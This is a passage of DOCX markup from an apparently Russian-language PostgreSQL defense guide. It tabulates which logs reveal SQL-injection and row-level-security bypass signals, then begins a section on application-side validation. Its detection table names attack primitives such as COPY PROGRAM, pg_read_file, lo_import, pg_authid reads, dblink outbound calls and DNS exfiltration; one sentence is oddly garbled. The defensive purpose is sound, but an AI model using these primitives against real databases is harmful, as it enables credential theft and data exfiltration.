          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_explain.log_analyze = on          # actual execution stats (overhead!)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_explain.log_buffers = on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_explain.log_format = json         # для парсинга</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сигнал R8/R9 (CVE-2024-10978/10976) — план с RLS-фильтром, привязанным к чужой роли:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="10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"Plan": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "Filter": "(tenant_id = 42)",     // если current role — tenant_99, это аномалия</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100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-row consistency check (см. 5.7) — application-side детекция этого же класса проблем.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводная таблица: сигнал → лог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Где видно в логах</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Что искать</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 UNION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pg_stat_statements или pgaudit READ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UNION SELECT ...</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> в нормализованном query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 Error-based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server log (log_min_error_statement)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ERROR-сообщения с CAST-failures </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">invalid input syntax for type integer: "..."</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от application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3.3 Boolean blind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pgaudit READ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Высокая частота однотипных WHERE с разной правой частью</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 Time-based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server log (log_lock_waits + slow query log)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pg_sleep</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или statement, прерванный statement_timeout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 Stacked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server log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cannot insert multiple commands in prepared statement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (= неудачная попытка, защита сработала)</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3.6.1 dblink</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pg_stat_statements + connection log на target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dblink_connect</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-вызовы + outbound TCP attempts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3.6.2 fdw</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pg_stat_statements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SERVER</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CREATE FOREIGN TABLE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от non-admin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3.6.3/3.6.4 file r/w</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pg_stat_statements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pg_read_file</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lo_import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COPY PROGRAM</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pgaudit MISC или server log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COPY ... TO/FROM PROGRAM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 plperl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pgaudit FUNCTION + DDL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FUNCTION ... LANGUAGE plperl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от non-DBA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 Metadata</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pgaudit READ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SELECT FROM pg_authid</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pg_proc.prosrc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-чтения от не-DBA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 Filter bypass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server log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Dollar-quoted strings (</w:t>
            </w:r>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chr(...)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-конкатенация</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3.10.1 CTE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pgaudit WRITE на read-endpoint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WITH ... AS (INSERT/UPDATE/DELETE) SELECT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 SET ROLE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pgaudit ROLE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SET ROLE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> к non-default роли от application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 ORDER BY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pgaudit READ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ORDER BY $1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (если применён через параметризацию — норма; если через конкатенацию — невидимо в pg_stat_statements!)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 Identifier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pg_stat_statements + аудит plpgsql источников</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EXECUTE format($1, $2)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> с </w:t>
            </w:r>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-формами</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3.17.X RLS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auto_explain JSON + application cross-row checks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RLS-фильтр от чужой роли в plan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Application-side cross-row consistency checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для RLS bypass-категорий (3.17.X), особенно R8/R9 в multi-tenant SaaS, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-side проверки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — единственный детектор до server-side fix:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Каждый row из tenant-aware query должен иметь tenant_id == current tenant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">for row in rows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if row.tenant_id != current_tenant:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        log.error("RLS bypass detected", tenant=current_tenant, leaked_tenant=row.tenant_id, query=sql)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        raise SecurityError("Cross-tenant leak")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это catches R8/R9 если они материализуются в реальных данных. Server-side </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_explain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дают context для root-cause analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Log shipping: куда отправлять</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Локальные логи на host postgres — fragile (place is replaced, host umiera). Структурный подход:</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`log_destination = 'csvlog'`</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jsonlog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для PG 15+) — структурированный output.</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filebeat / vector / fluent-bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на host — shipping в централизованную систему.</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Elasticsearch / Splunk / Datadog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — индексация, retention, дашборды.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита самих логов от tampering — отдельная задача (immutable storage, audit hashing). Для compliance-deployments —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с remote-shipping минимум.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Real-time detection: pg_stat_statements не подходит</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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агрегаты с задержкой (накапливаются между sample points). Для real-time нужно:</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Streaming log-aggregator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Vector / Logstash) с rule-based alerts.</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`log_statement` + tail / grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для targeted investigation.</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External monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Datadog APM, New Relic с PostgreSQL-integration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Чёткий signal-rate бывает на 3.6.1 (DNS exfil — каждый chunked-запрос виден в DNS-логах на target server) и 3.7.1 (COPY PROGRAM выполняется быстро, выделяется временем CPU).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с другими разделами 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5.5</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log_statement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log_connections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log_disconnections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auto_explain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — config sources для сигналов.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5.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — application-side checks (cross-row consistency, SQL parse pre-execution через sqlglot) дополняют server-side audit.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5.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — приоритеты grant-аудита (от какой роли допустимы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, какие функции в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_proc.proacl</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Связь с категориями 3.X.N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Каждая категория 3.X.N имеет секцию «Как выглядит легитимное использование» с конкретными сигналами в логах. 5.6 — собирает их в одну сводную таблицу для DBA / DevSecOps team.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R10 / R13 / R14 / R27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — special logging пометки в 4.8 (informational CVE audit-trigger таблица).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.7 Дополнительные приёмы валидации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1–5.6 покрывают основные защиты, но ряд паттернов требует прикладного слоя: bulk-параметры, whitelist для identifier-ов, pre-execution SQL-analysis. Раздел собирает прикладные техники, не вписавшиеся в категории «параметризация / привилегии / конфиги».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">unnest($1::int[]): bulk-параметры без построения IN-листа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Распространённый антипаттерн — построение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IN (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> списка через цикл:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ Антипаттерн: каждый id отдельной параметризацией в строку</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">placeholders = ','.join(f'${i+1}' for i in range(len(ids)))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sql = f"SELECT * FROM users WHERE id IN ({placeholders})"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">await session.execute(sql, ids)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
